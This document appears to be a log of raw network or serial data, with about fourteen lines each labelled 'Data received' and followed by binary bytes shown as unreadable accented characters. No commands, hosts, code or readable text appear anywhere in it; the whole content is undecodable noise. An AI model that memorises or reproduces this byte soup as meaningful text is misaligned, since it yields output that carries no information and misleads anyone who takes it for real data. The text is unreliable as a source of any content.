Data received	.Ãj]©jKOI#3þ«'&®.e¯¬±VlP¬)±czWT6íøf½t·Åo®èö-»\_ÛÛmïäy!è¶QðãÕ·Ê+6³HÃë@(<b¶]üÒçumí©ª_W0?+×[^t~L_QGvÓHL{=¿¸ÏßTA_èØö¢Ù'nXF¨°¡·cÐ¬4¤hÍ00ÍòÓ$jÂgÒß"ôÙoO÷K(¹§úÅþÕSIW¯ð÷p#_÷94hrÙþa¼gx EÀögÍ&rÊðÞò9jÊ2Ò2òAôàÝ®%²¶z´aæÎ4Ø{3LÖ ¹2MèdM¾$sxN[#6Cã»0tmÞ; ¡÷qùw~xiÊ/ÂÙ§¢ºWdN½%QÁà¯Là_ª]Ô+£Qq°¯\|kM8ó¾Û«îq®S£rÈÀ &¤P¼Ã;j¼ R$jê ;^r2ÀfäÁº;MÀnÑ½í}Ñ¼"A.Ïqi¡B¶ç ¿/ï\ëíë³rr¿!k÷I^Ã¤ÙbÄíø#ÙÈ², G$³$"u¥3kÈø><%§O9"ÃM8-c!nü~Í}LÎúrcÉ[û<oOQîáE!-¿ôn:¼Ë¢h¤6)e©ýMÝ×ñÃ²cJbF<dÖÎçSA×4ÒZ>D.ü×¸¹9ÛhX¿?©Mÿm6g¶hEÒÛð+ÉF3µF6(ËZB¡$½ÎxÖÙcf=²/«¸Cú¬ù@?ß UÞUBúûIjNmk}µ^+rÞ[ØJº6r´üoPHW0Ý.?A7½¨²;Ï¼HµRÔÍâ&5`9·_11^²òô¯q£qH;¢ðRiãïïïÔã½Âc;ó4¾ÊãýÛí¨urèg^ ¢pÆ/vSA1ÓöBÊÇÅ¤a©0ÖPBìÅy}YÖ°ã9cE·nÛÇÏîºwã³Ú=×öõ÷ÎÔX'Ç\|mpïR¾m.ëwÑmåÅÊP¯½m§^T/ºséfù«M-§E ¦üsÐl¼ !Ä^g Î+-,Ä×PZÄ5;Ti§»ò¯ºCÔ±Åµ³ªoõÇMß;ï+è8ÒLü^XÖ¶T¬÷`j[«ät~y6upÃôÞ.}åÓóò\;"iàuÒãÌ'u]Q9TR/É"GÉý::54êq=+WÚÖâÄÚ¸Ä ïGEäh\vgýF°ßpMöí,Ý«¿a^à´=ÆÞâfµÑÄ[¶3{a¤¼å5cÜbñF"± ¥I`1ÞqP¿)a°fi!Ï ¾(AT8´ì)Ïñ¹[k&ÿaûRÄ\|y~÷ríså4&;$È2VÓ·NêóK0¶uØ¸Gw×\|¿½'×ø)2Oà«] ðèÒ[~Úu`]®¿Ed VB³i)ÔóñúýËIVýw=ÄÙO6/Þªm`° .®1¬u!êaS§+Â3\÷¥ìs§IZZîk áýì&ÅC3d½¿£!øhôÔrü.öÈ¶À6ÛÓa³XG2Øl¹#ÖQîó8ç-Ê¼].mÅTr0õö²¹7!M4>ýdý\¯®×£CÚ¾~³Ó¢r å÷
Data received	ÿS0üå½ÀÁS]S\|S·¬h(_Jåë^1'c¦ÈHÚX Ïøtëò2Ñ« ðw^¢âé¶3U&xªó©Ë/W8VW¯ð8ºAh@Uæ2z&pC,Å%4ÿ ý\uÒSßpÀP¾e%XéÃÃªÏ¬õ(`"d^â¢ÎºFÜ±T[ KlÍ_Ï êr2yB{ê2Îh´ÉæÝì?þkP¡uñ¬ùRoCV¨ÉMûP@ÎÐâùÖj_{å1óàÜ5R¯æÑ6ÁÞçm,¡CI±¹ÍÑê!2ÒØn®à5ocü9ÀÄlwâÃsZòÙµn,iêÎjúzäD:5¶mÏM¤ð4¹ î¢³Å¤éb lqå':7¦ÄüÄ7ä±>·WKÌÄ@-yàk+Û¢öÁrnÜð¦çï@éxTvÚ×rSrð'»i'·Gï8ë ?Ec>ÒÑM"áiÊzÉTå³ûÇæÓ¡¹² !=#SïÍa¥=»kñ!¢B<Þ¸©j<¿zßu\&<Å!Pö´Ë5ºYtâØQZÙn)²ç:®usÆxYße%{µ 7IÎßAþÆMB`Ýô¦ÓÑ)ÊDq'GGÇqbÐêsI`KõPïDVë'%-í-ÏÄ÷ð@qâ)IÑI¥ÔêØuMQ{õ,U09[}>2ã´Q¿YR_xVP¦dbÃSâWíEXÚ4NÒúï^ÚtOlã@ôÒÑïÊ¹=©©ðlCS\|59ûKW%C>~W"ózl_»X«ÖÉKwßÁWïgo¬_dÜ'¯ -ÞpÙºvÛ×Ué÷!´ýò%pôî):å3%äWVNyÉY%;º³çÙëB/ýiza(9ç21Vô÷ãjj2:ÕNôÌìq1×AÚ7ÐÝzÙ¥D~Væ$ÉÃVÁòB±I föÅ~oöBoSÁ½Ù"§fþ9ê¾PHvJÄ1óöEÄÂ<ÆàÕÄôúA:+ÏÑ5ã¨Z\IõÂêÓ¦Þr9²Ú]U§yïXÞ¦«8Ä C§³Ø~ê¼5P~&ÿ{;YI³ê[×Tá#ý»NhÏky§¿VÜ³° nè`ä5<ûì¡ÌxÙSÄÒzßfÚä¨s8¸»Hº¾/lä¡[z,%£fÓ·¼òþ}µ^ëqøþ.Kñè¾¹ïÀ)/#/N,i!ú/·òétè#¡ÇâÒë,Ì7å¯ ùBSç£(ÛëV µi9ô9tqPGüÎ7a°Ô ×üäj ãîEØ§IÕö+t6üÐ+-è>Ñftrw'è(Á(m§£rÌ°´8ÀÃÝ@²ñAM¾huÞaî:ÙùÒ#ãZoZYóbÎâ¿íbJ#üzµ±çòIôkÅ?³ÅÑ)¶6¼ø=üSã,m ö"úÚ÷.?qèm, Ê³)tË³_«ÿyÉÍ'ÕÃÿwsoU¿ÊDéÓÏù69Ñ¾ýÉpÃ)úÀlPzDÍ´dñTþÒ-ì3¼ Ñ\|® tFÞÅ´èÔ}V÷1jÞ^+6î5Ï V¥$MlÖOSºb(`^Õ¥¹qaÙeêF]Ë³íÚ7Å!Ð·ëÚ7k¯6àËTsrãWD·
Data received	?bÿfµxCýÖ}izè%þz²\,þîxë4ù"Lo@d0ge¸G,3+ð¯« m¢(Â åÚÖñBßGÔ ®¾ýÚhCóÞûì àË cf W¤E;ËbÑàô/¿<_íB(Ò·&Ý:Äjeéx¹ës»¸õ¹ÀRqÏëb5Ä!ü-=ÁSÛ¸}èÑQ9=Õm,fò";7%Ô3û4®çk}>µ½ÚOñ´Ó¹Ü$àí¯º\|z)>48q}æPî'Ä¡¾úDã3eÀv¨^ÅóR$-¹0wÊY7#í0 IÄuTCS+Jz7æPåû#ð¹éÿ~%³.sS½'R¯bÓ·2éò-+Ñ¦9[ò¶ûË2 m'ÃæÔ¸?þy(3Å´ó³ÿÓc{ë+ÿ[¦!õhh>GOõÃÎ®OvîÑuRüèI.çUØ«§?¬{¦Á°¢_¿ðØwñ¦#zóNìgê ¦«b¹¸w6X¤8·×K÷( Ôêùpbäú¹=´ÊEIµZíB5§ECÎ,û'ÖgxíëPVúµuÇA¶Qíú9F¹bÅ1¾÷èÿvºÍBãøÞ#{ÈAJ Þ!X8êxîï}\÷ùsßX®Úsa¨S¨ÉóLZ¬DÛ°÷\!ù]År£#©XÞÈ^çÇõh6H 0wp÷ñý)ÓqÐ,QPPZ:1S¿.b¾G`µÿ/DaCÏþ.+»moE^= þAõÔ©·ÚrSÔÊ¬: ì x`>±kÇÕ úòÐS¸&4ë÷ lED}½3ÕNCoÌsûå5á§ß'@ÒPU® ÕWÂùÀé÷¡Íþl#Ûñ±åg\|=nÝÉc3u[SB:Ø!ÆÀêº0ú}z¡ ~©ãÕÏË:3Ú0v²/þr@ï#§WÙïåò~JYÅdéÒ++¯ÎõÖ þôñ'q ÔÍ É9m/ÿÑÆwåââô\|B×:<q:Î,^l]n R¦æåFÆHÖê¿&2÷¿zo#æÆ¶Ôâj5SÅdL¦à]×[LáEµM?õ°ß'dØS^¹Ú ®ËóGÑ¢ü`þ¸«cKvLñ¦F+Û·zÊQ4ªrÔ×³Tu8Ú²eëúý0#bP°ÆÜ`^mÿìÖ`1±gö{^l>¼úmÇ¹-k6X´fKyå¿8í'ÎÐ'/pXG£ðÒc1¬@ÃÝþ °¹¹-HñãAÅRor µdê?üw¯?ÓO9ÄÓ@fï~dT¤YÉ²çhHm ÉbçÉ4´8R,u®<ykLÕÕ8ü ò°n©Rù°}¹=U¹.EKM=ÌJà¯Ï^¿ÜrOÀ]ÒFNnY:i+ÑUÿaeåüL5 ©ÎE×SÎç? ²É)PCkº'Yõ\é¬0Ëè»t\|Q{Å¬¡ØÞ~Ô>>"ÀKRÇ»Þ#¼&}s\|ûEdñP ¥Éß¦Ìð_Ùüu Ù@Æ®AÄegÌn¶Õtú ý¦ö@rÔVqÌÐzy BÍ:¼[jõBHF¾¼>ä k:hÈ3¹Ì!«ôVÄãJ ä§^^¾
Data received	ÐÞJº¥ªÓ/êïo°Ø½xf`Ñ0o£ë÷K0^3ßÕ¶6/©² v%ks±3/é¦aÚØÓ£¨þ¢ëgA ÿÌêÏF+g6v§½n3?»°ª¨g6?äÚ{©£Ôú ÿu»°> ýÃÜþÂtuJ´£Þ/Àd$7StZbÒT¿XÂR1nÈnç9ÙÄêTKEuBlßaöÿïCå}6Z·F?Ë]çôúË;b´ÐMy[hÓ§2¶ò8cänÍìëpN«hêhdÃ'6¦Gj<ÊÛF-QTë9È®²[ñì£^ 7ä´©÷<ÖÓpÏvYw00õkÞ7Tq£ÕÍ×Jõ¨cÆ¥¹>À}pyOñö7÷³«l³æsÀê@=huÍ Û®©$}{¡?þ[üÄPÂk"ð¢ÄôE5ª¤d^KFG3Gäróu3K.á"3Fèá©Ne¥7ªG'?%ìÌõf-KW,àZý&WÚ³ËÁö'ß^XÆa¬°J©3½Ç;TàpÚ!¦ÛÐ¡é ovÒmyrµ ÏñB<E{V½[+ñC^ .Vûk×è¸³Ïµbp½jp¥ä`3Ô¦½{\C"½ÿÇþÎËkþª%LWº°f4¾I]Äÿ8êÑs Íc®ÉTP;cn£ÁR[\c ª¦¡Ôùc±Ò/ªü¡¼}áàs`,\|WK±l²øQÊî"¬õ+ìóTb¾ô ].ÿ\¶u^6p\Ð%3 õHdzëàÜ{}°Xe4ÔáÌ³BüÑBÄ²ËÉ3fb¶ãÝHwÛ=Á5¸ç&p¡eÀÌ+]ç2×Êææ"pYo?6åE#+ôÖp«HB3°Ææ7>Üçqóý÷¬ã3wz¥(àíÂ<ÏpYÄÅm¨ÿö EÔ Ëñ!w/ØèJÁìãÃX¹XâwHÑåI¡¸qèïdÌ!H\ºl°@ÚÇ$vïËÊ× kmÖx²P7ömô3M_9à"/Ü(îê²ñÀ2ê ²t×eG7¿¥âÛÐ4òá5J¼[0ìÇuc9$H²-féï@¢ü%½xnXZî×çCY#bTvæ+]/ûðÀ\|¹¹¸öèëeSÕ¦r$shÀb;¡+ÔTàÒrºx\l7HÉà ÐïûF(H¼J09ÕÄó>®B,ðx±dÊ¼qú¼¼ «¥ ìf¨\,ª1ieÅ¿Æ·OÿôÆ©úØh´}ïN§w åjAásª¼[)Ù2Kÿ' ÎaÑ<¼ñDNÉ»bBøTÞ.fr×¯û?_qGª±Ïx-ãþÝ°"ÌjÕj-]iÀ×Pº¤Æà· .E¿Â{ ÆÇv8w{ºâýÜÄènß>r2Áßà "]W´$ ;zC¿Jçâ*þ´ÅK;s¯#.²öØKÉÛú¦9W÷rQyJ¨ãUKb¡®«ßôÑ´æÓiÚJe¤àS÷»o'g`Ò(tÍí[àÃÙ»¶q¡IT[Èì±vg«×·@ÝêìëVâ¢¼:ÂV°äÇ´ Ýð¡¶ ßY²$xñmÙ
Data received	¤Û:¯0G®_aKdNZ{À(zSû¦Î #ã$+Ýä,fB- Øõ0Þèsñ NÓúi½&jÚßàeOS?ÕÇ#ìÕß¨²î(P{Ó@Rx i¯ë±º;¥Öµ.ÀJ$B0ÑrA¹)f; $Ìs.Ï½ñÊ-F¹}:¾³? IöJ²<ùy9ý]¢Bÿdïð cn&õY^ç?â7òg¿÷ÉJºSV2F>yÈÖæ²}Î¹9¾ÑÀ"Å_-aásc/ÕÃ÷7YMÄûÛ7zëfìøÔmºÅ¬s6:ºþå>Þýì«"ó¸6è.Wf{>éN2Î¨Üøèø¡sÕèÙ<qwYÕ¶·hfcCN;{UðîÄôYÙ.¨i°ûØ\|ª¤ôß= °ÉËíÖ/ñnõSç»°ìdÕÉ åIÕÏòÈ?øS7tb¶1ñrN¥²s¤béÎí )á¨tn{nÝ0ã¨t«j¯ÍÌ{7Ñæ^ªcÙ~©Ó½ëÿÞ=VñÔP"i~³ÁòTø(õ´áªí=&Zzs÷¤OFwxÒ^ÃïÛÿë\îXµþXÂ6×Qñ Ö«"twû5ïØÐì¬¨pÉ"¿9ÏMìäÅ{ýa%ÜÆ¥þ4«;yäûÖáÙÊþ C`AO&1±3ê/`<®1£\|>÷qDVV}n>´xð ÅDL3V~YÙ¤¸nÕqnú£câÚn--üuÇ ÖôÎhî(ÝvÉ½)±%÷ú¹¶1åÂHWàø:Èü'>'i¥Bÿl¸V×Ò¿1_?áíÁ}¶ ^¨ÎµÁþáEQ{ P_Îw¸²vöBÿ¬Í{Îô?í}ºSuzTÿáÊNþ9ÊIÜ§ÆTbÄ®MÔ"Ïm9Ó÷/ÿoXJLêã©ÆVö=ùGqÒÖZú®ENy/XnìÄË»åÚ¿Ú_¤(ÛzâÁ!PÉH-F[a2GäÞL)o;È .ñÐY<7¼õ~ÕÒ!(0´`ÊE¨Òàé7pcî1?®éwï$fâÆYâwY\ªß rwV=Î¦Ç×¥z6Ñ U·_Oéº¢\|YnØuö\|ênªeþÐ[Õú¬®l6±õÿOÛ)'\½e÷ù¥¯9Â_OÐ~A´i¢ê¦a.º/h²Ö{îÎuéo\èöIÝÜ?õ¡Y¥1I!~Ú§V`-Än§{âsWs =iTâX23¡®ø4o5åÀèå;ÝÇ1"àhùEki×§1aìÖ[ï·¼qí´Öq7 Mnº¼Eh³%?Die\¨Ã"Ì <oÓp·ö%ÌïMÂ Ãì½ZûT ìt*H =½b¡Ý0. à¹[Ü(ê»¡Îtð®Íîp¯± Æ·ÝuMVÞê`´òÓmbÿ½RÓÿtâ»qLÁ:¯qjbåFq³Év¦Îiß'«JBEf Ü=WÛvÐÿ0nri5³)âI¯Ñ.÷Ò2F^=½KñIÉWçÃ{ÛØþ£¢ÌæëÔm,¯§dd«¬hÂ(Í×ÿBÃ'aÔª£ÊÊÖ^/ ëø<é»ÎrjYñJp`Yã ¾{¯¦6ÈÍøÅþ¸n!n×ì>
Data received	ù§LXÚ ZïN2ÆoÝsÿÏCìTCÒÕ¡ð%£>!nI_k÷ßuÒw©rÖÐÏÕ© =¥ô3¼p-©À+d±f½Áº@sÛ9þ6È?§9°¶¥úu §ë~Ç´qoõõ1uZ:f®Áë\|]hÃÄ»U ê¨µLêÄ Ïþ7g8´ ê%Ð ÆÜ9?áãÜZfÇq }+,4¥Ã_{IsôAr`v¦gH§¶{¤(zVÁY&¡¬¦Mky î¬¿<Â\ä{¿ïÔäò¾þ`¿âÅï ý5ôÔK¶Sn¿fE,³Xðó±¾HÁ?ý`wíú!-©¦±!ÇøqoSEo¦}ôöáU4ºßIÁß1wÙÃpw`5\i«¶B4iyìcR&jÊß½Pýoü)+ÑMpöÅeÏ»¼¼ÂrOÎðêgä +tøf¹ÞgÏ2X@qbTfõç\ñW¶&ºõdFäÊ+°õ*~cÛ õµ}õTu4R'+óæ\-¿åë=Z¯,Z¹ØG÷×0-Â rã¬s)Ê0Ýö ð»án!7f=â\|r@©£/C¤èÄî¶ª3FY»5¯Õ©Æè6¨l1îºèéUßFÈëZµq«úßeèë¬ºPXû&U¼ :C´3¢B²ßÒ²¢³j¸d m;â^ <fAýI6äËçÖ÷. e\|bº¯X¼d>£ 3û&´>.âC.nQ'ÔFNhÚä°\¹7.iàG¾¯ñê¼Qw m5\| ÃÈcÂçår å+Ð4hÆ+ÙjvfêÑ\ß]ôÏB¬ì9DðE®YeâbÍ5Ùc¹ÿZU]ë@ÐûwsO6ýÛ»ñß)£Ï \àP¯«®ÉÛTV¹ï²ÚhR\wDÿJg0otæ>uáÀDÊÆ"o{*ÿ DèÄN¦{²\eí¶¿éÂk:ÌhòWöõÉR½ßP?çÊ?¬«¼Uÿd'=u¬p0=cø71¦"2:ÕßÎ#m¿H»í¥YxJÞÖ ýþnÆè.nh9zÄIÑgeÑýÀ/ üêC>\/Xdõå»êª\|Å½ëp¦X¨aGAêùÇ@=»r XÊ6wwïSÛE}CT¡eððÌ"kd@ù÷ùúØòd5ðç;Á/ÄÄº²±O»T÷í/¸Ï>ç<·5âÚ!ä/ÿ ®©JãT9ä'÷£l~QÛ ÿ@a6¥ÖýÜ:ìÿ×ó[.¹Æñps-o±8wº×E ®ê¾¤ghn ´ià°qÏ³QMø¡îÏ:Îmà[_3Â½:ÁÉÝGìõÑ~£ßLÐêEBïÖ¢ß¸{6<5dÌ\|3¯øGÏº!ÙÄe¡EÉn°ð Óê@Òåú±ôÅ?Àdû¬¶b¯¶°Áì×úÎÞâ=hKÀ §»{cV¯ C.[ÚßB³îcúÂA1«êY±çËIµVSd,,HàÝØ-þ:Zí ÏÞÝn!/TËùÔÐ;YaÌÁÿÞXjX`qà4ÞÈ¯Q¸ âÍJïNÊv
Data received	:ÉY×óî×?]Öø>þt Mø9Á)ow9Î(&5Ãz`áÙÊ b&.C¤´§öyX®Ì(Ñ3óKÓ ,,>¬d±9öÂX£HÔGóýLoeÇUw\|{ª éî¹¹S_è ,ïÌm ê&îÊ~Z\¶4ªßù¿kÿÞ ËxEâÛÿzÿÁq®» ÕÈò^aöÙâýB(òáÊ«`áæ\|{¹-_eÁåh;ô¹Æò:qi<¸õEân=ÙBÄq>!k.@~§û¯¤'/{®Zµ°IËaCë\~4°ÅX§a¸G÷¼èåzÂòö7Q#Âè5¡ÙItdÑ$ÝHóõ¶">¢Qñ; ÜkôÖìúUûw4[OW&g$àI8Nå<ÃßW)ÔSUÛí'GjOAÑ®y<¹6½¾@ÐpåOs«Ó«g§C!¨ÁìqdÖ+>«pÝe:÷µËv¦ßU;+I,Tà¢v éG&ÕÂAÿñÁö^ëlù²Ñ @ôHÞL£xp ì%«Jo+fÕ/â9ãÛJChëdÔ¢¤Êü`wßªG_dÐg½µd[±ê< íØæ'ûn¾~¾@T¡¨¨]Î5k,ÖYGÎ«<vSãPä£4HÊdÄ:P½ÝÔµE1ø:Ê9¤íVÙÅ <\|cTxòé%v^3ï¯ÁQÿîbÃûe¿'%§ã=ýÖgj`rë®>ÁàGB¯WFÙIùâM#ÿR¤èûsIH¡°þKç$\NZ<¢Ëµj½1ëç)òÅ¾7¤Ê2¤rh¼jÿ4¥^Qí\|ûXå©Ì£l¼>goºõ×ZîÆÉîà)7ö(§ôòÙÛn¶ ²b2îH´Ü««¾dr\²-£ü8æáÙ"jQsrñ¬ÀèbrS?«ìáGå:ÛÏ¯ùç2/Ge}Ü ðñ»`²Ù2ç÷ÉHãw÷×¼ÄÍÐuLÊá¾;ì6@ÅCs.ÊøzwÕÃð·6çºX3¹RÜEÐÓ£¿!^¡À6Þä¾¦X!:Ç³ JÐ½¨ýA±}4ë©ª_¹xêæJé¢P£,ÿDºÄ²-ëË·ÁÑH¾ÞÁy{7ÃBÏ eÔtÚ[ Ïò8É»[EÚ¦<¿wÌU½ºòËÕÞühÞ772e¶¦F{ì}}.Õ32,U¦ÚÒQØÎÔµ%TÀÜÛ±v¹"§n=5!=o ïS ëy¢CBÅ5èÿüGÜùÆàÏD¨îñ,Rsaµô6²]}l+UåOh¾cûL>¾B´9d¦j $Én×ÆÜ'oø«¥o¥3^çÓ>ÕôjÙ-ã"W¸YnÆM[mûÍÐ;OÓÇA!O[·ÄÒ1ïÔ;LÖqRÙÏdÆÎé1K_ÿ<µ=®¿tÜxÑ´¢êp# Ê§çæ[Ú¡9»"1ô°p{µ£n0\|ö0º!ÜÒ~áOÅ±síÿÔ[göÄT]Ýcò·µ·äÂ¶ô$©Áºèo-!²#CæÏ ê±èb¦LÜ`A&Q²j¡Vt?ÁÖ¢Ä ê¢Êå¹}<&p>`ïÎ^9£Á}¿n Ù=Ñ,
Data received	çëN°Ylª=ßC¥ái´}è6Þyðæ3ùD©I6ç§(è©ãÚFÿà QÍ¨í&ôu vAëðyZôÚæq$fQ¼G9ÍµµcÇ\ÁÄ«T¢ÞÂî3\vzbËMm:ì=ÃðeÚJõxìÈíÑ}+þ<ªrÂ¿Øâü^õÀ3ïêéù6ûÚ·>Fhá»#î Ñþë£Faë"Kw¢ð×8GQæÚÒ§ë¤ ^Õ9ºÐB#`swª~ä:YUÉ(O;dO5Zj\|Çgä>µm,¼JúgCÓÆè }ãhY¯È{OXãjB»Õ5O^³1q1ÐôobÔêÈ\ÁÁ_âÐ T[[!G>yb<oÞFðmk Ãç/N§ÅêÄfv¢kspìwÖOéÎeÉB}ÑÎ´(Ý"6GÙ38S¦Ë»Í~þ'en³ìææº1ºóéye\T©Ì3 tÖ²wµBHäfvQEC>Ü_- ñ ãÛ:~$,§x9-¹TxªÉ©`I¾¦¶Á;VDt³X©Þ³1Xá®¡óÚ^£¨Í\|V£Ïþì<=ðiïa)æ¤×¾¬êÑx\|WÓò³ø&1a\U6oH7À#7t6§áô>MýööÖl ÜSA¾\88ïAõK¬:¹ ÝÙ¼¹Ê\|]¶Êìê¢D·É0lî°g¤&£óºLÞ»Äæ-ÑÅmëpë\~>a²=´ég§$:j¬.Èñï-iØ Ør{BHlu{S§×! @Í?ï)§ÈéKpAKu9ø´tÑKÄZ´ÝÌ¹U ±1ÁTzV¼]ªYÿÆ@Ý¿Å3X¬Õkdæû3µ~C;p{6Ïí£#=l©Úîk 6þ±i¦N£cA¸þ<¬3¨Dfz1·¥×[æ¼AÜá_LÍ°¶°Ç´ë¡&9"l §Ìñ/âãpX áFÞ áÓá¨5ðhN¿ò"h-½pÓr®-SvÞAÒ£ÿ@qzÉ§O¹ñýíH&îÎ"lûwFæ1Û?ÉLv=L%¯?¬UO9fBçü'ÍÍYÊeJs5!Wé´{ÛáxÝHrO48¥µeÙß»´Yú³®ÎøFTéI}Á.e9êÂ,Ø®«¢ ¨ôTmsë1XKç×¼ÎJÖ-:×Â¨wÌ "S. ÇNóì=$[¡:9¨¦mM+DÿìlÌ)}Dl$Ò>LµX/"Ý»!R´bT\| /9¹«SóÔArýËÛPËSv$¬lþÓãt¡Á·\|SD.ÈAð§<~`)Á¢çBu¥À Ð4+p÷äÅ{g«"4S`=r«ñ ÜÖ¸)·gþÒ\À>X,n`Ú¢/DFD7u?àÈ¹Uî[\|þ"lÆ íX 4Z©wîMÜvÿÔ-zÅªeÕÉ 0¸Ó]Bp×8êEéÂ3ÔÅLþÅfxÙ%Ç þÒJ«`tYÈg1ã«¬å´>×i<0°$0+ÏUBË%àüz2cDqòå°:þá·pÑ#Ý#^¦=¤#SHX´{u?Cµ&QèÃ\|¸z-3zpZô´ëL'ç
Data received	øZ r*KxðÝA}3c¡×0T\|50
Data received	&¥ÌeýtÌ³G²á^×:ßßäéìp¯ti%³&ºª4A°xgvá(XOÔÐZ?!¿É-G)EôKî»îfZÆaîôuOæ,W±¶äéµBWÒÑÝå Ú/£ïuê'v Ocï¯¬ÊÉ\|ýâd#á®AuÐ9ÜF`çÓ2÷.ñ#võ¦¹/ÀfkZf·.ÒZZ³SX¥) IÁæº°´&,p`Hq¶}¬ñø^ÿl6qÖÂiVYP}3SvÐæ¡9<jF Amü~OîjWªíÝý¸M],hõò)ÌMÎK}nÓ{Ï>Ó l®-ìc!Lv<yÍIKñà+¿ZÓ`t´uj~î0Î-Z9rjpEÉg§mÀR±¾w.1ð,ëìªQþôØ¥6<JíÏ£X]1@±nÓ$[vètpÄàgËoJæ¥èÎ ¢ß½7ÉV\EËFwäeæõy®öòA+»-tuÉSBEðÇèþÈ>ù:úG+]4&RSÃOÞ¡ùÄkC¼yÊÔfã¹-;âYX%6#BØ@\|ÒÌÕÿßÉ¸Ð;ö"^vSáJ¶ »PCèµ¸%ìv@'éìv7×ÿ(¡ôM]Õù é9~þÈEÓ{ÕÂÞ»JÞÚ%»ÎÂ¥öDµTál^ 2Ñ¥g5Õº-bZ3ø\6pxbC¹=ô².I/µ¡Hg0jÆÐ>Ö9=íËQ9oEe&\|Ï³#cê¾¶rEEB ,+îµÜùM4GÊÝàÎSÉqÅa¢<}§ÄMSÂ¥â»¢ìÂTkRq!l¬ Îsx¯1@¥£¿;÷¦ðï,F5ñÖ·¹£{³túd²Õ=ú-ÔþW.ïeëQ É¦Ôñï³¥ãÚÈ¥ÞJÁåÙ¿¸¥J>ÐªÅ¥qÏ®³£g;Df c¡°K5Ù·:còãTv °ÛÊ¶÷Ðik<S°óõÍ1iF:rywqóbÇ@È¼5ªÃÒbþ³Ñ¾ Ì.(Í·&åNe,Ys Ë¿ÍYãcuÙ2Fýúéîª5G«~%¢ñÆú³?fõÒvNÌÂv9wsÿÜwÎøüH×_5v}UövT/!¸n®K!).)høæ?e@{çD×bÈkcQW\å¬xáòé__Îô÷ÐI$Ág!e_\|[¢DÁiSõ6°9OÍ[3~T}öx2î_ñÂQ.~wÑ{zÉÝxª3Û¤8fnvhÑ?CS-Æ¾É·E±>ÐóÀF<ëÄÈØ®,`Xki¿uÌÆÌ§CÆzaÏ_ö}âÌFNÙ Ó§#ÄÐ`ÓóVmX¼iZZDÑ®#]]B3ÿ^üBÙýp,\|o%ôd¬6ûR"¥¯w`}òÌæjÌ^¯3Hyù "ÇÂ:ÖÙCFÅsÆ{ÕiF·Ò_îÃ]¾ iÃw6!J²9':Q6cxÀ(ê#l¾'º£ùÒÝóZÜâneÁû2_Ìî%åóúÄûI='º]kìzJ}6?6$ ÅAðaå_£
Data received	ºe,`D$E$òy9Z¡î)æïJýÑjgñÚØ×[w¬ôðé°©.~¡Cn¦ «ö¸ªJHi7 Ay/¨\òâÀÃH2X°:¯× ¶pÎtnw2s{ócú´(~séäãfFS®í.Ûè;aãw!0Z-'=çø¶(MåwÎ2§¸4_2\NîR!T"YQë#+Yú4¨KÕoígUûS\|1úÕ¿¶¬Rëµa¥a÷+áâ¿ì/#¥'ÿ6 m÷íÐãßÌÜ Rá¦XTÂäTfàþ ³Ã¤W?Ám¨Ú("LÈ½þ«ÊóNÐõeéêï¯0ÊÛ%"À->ÆFá¦4 p)lìbªý²öê¾ÄnTÔMÇK¼Ø¥yìØÊr×uªB×x·©}üÕdQ$b'âõ$¼SC_1#zk4þ8 äX ·"pµ¸:r]&ÄpgD¼6¨¥C$¡§â{èÌD"µhûHSh§ë¦¼²°L¿ßgWº?Ò§T4\ÁòËUvàS·ä²1øg:yA6ú ÉK¯ÞâÎÝQ~å¯4b0éQgÊ<ª¢u«NÖ-´¥¶Nç±ºÒðj~z²6â"«µ\|:²ÓaIÓJû^D?÷i8}ØÃµ»w±ãD {wÄ)gXÎVÔéêv´ø[~jë=Ga(ÞÚ}<-¨'ÜçMV¼x³VzØ.¡b\ótwÕ$ýÃqÉ· µ¤ÉÝÃ§?·wtÊñÍ«ÿ·¡@D¯æ@ÌèlÚîã$.Ü©½oýðÁû,Èéþ¯¼?FqñP¸ó÷îr9¿B»KK;H¹üHsÀ§7ªÝmÕÙ¶ÀÆÑLTIªP ¾Ô{ÿV½×¯]ïw`ilí»$ü£¼µÉxÑx;SKâc]áÀ/º<8Q//Q!ÓÂ)£Îª8ú¨ïÊã~p.G`äÃ%«o¶;n\|8Q;3]d¹äÁ}7$þß5Bó¹ Ü³<WÑ>^¢Ä§½g.É¢9tA%8%£qP¼wO@ÿÂÜ¶ÏÁëbnª¼AÔß¤üZµÍÚsa¨â, ÔRÇ3òÆ¾.}H)5dHIu]{ô§öð¡JC K\|ÝÙ^-ÕcÕ¥t; 47woN¨=Öj$4òµÞ¡Axcm ³º¶6³Ìcefk£wG¸BqÈ×¬õªç6P¶¹m´%Â«b^ Nd"¢5ô$\äÔ÷¹ÇE÷1( AÉÉÅLæÌ¥]V"Î=ÞtWv&õb4¸ Á@IÃÌ4¼H8+f¼÷ X'5âÞ=74Ô-¦}gHs5_Ê/DZZ<ö¾ÛCÁÙ ,¨eµæhybtÜ}\|36ûçóv¥ýºæïpDjiè"±úß2æJzÁ2WHÑ«è¬ÈàÍN§ÜÆÐJÐ#"[øaè$ÚØÉRfPòÍ;h<¿ohÿöÍÞBÈ§eô\ö<y 0±kk¯Ñ÷Ù!<Æ³NS:I²¨ÏV)(BR»LO< ´¾{z3ÃÉÆÖÕ¦ÿMËzÌ9S·ÛïÕ>9Ãßùå ýª]ûÃ¯®Guû güz
Data received	P
Data received	¯ÏÛ®"á7cA¢±ã ø:VOá.b§CÇ+Ì:Ü\%mà%à©y6ÒÁs6®ðL+
Data received	«I,ãUÉð°¡ª<.i!ÚXV2½-²C/e3ü3¾Ê¹<Bé3ý_ëp-Ì0EíHVü03P¡ùQ@PFZY8²G,Ym?Ãøül>ÿ£iÇ¹G7q¢¹³Pæß^\gE)ÃIt;q»iþ«¤n#EU\ênHµßC×8ZúI»×ÒûDOÆ5 VÀc¹íÚ ä\|âë^/}ßÔ¹ô Dµ_}ßàa½ù·WÚÙvÜö#ÐØ `Å 7`ÃþË¥~ñ!²÷l §ò]zTþ3øîHªW²éuJFu.±ßcL¿ û<{d=ºrIãÒÏpË2v¶ª#ø8Jöb%`ñ6ieX«±ekZ×þÊYÏtérsXâîÔúýxcïd'Ìó¦3Ç³v¹ye\btÙèu/!¸¬¥²'c°Äô±é¦ÎGéÚI:Ã ÚÃM«ü¶]m¿HÜa£Ô?6ùÄ÷i>ÆåÃ¢CoÖ¹o.1» vÕÛ¹CÎÉ4³²~Bn{ü9´ÐCg@an-Bï²g§%D¸ªoÒÔ<QT^O4uPÅÌ SÈâW<f^nêeä¡ 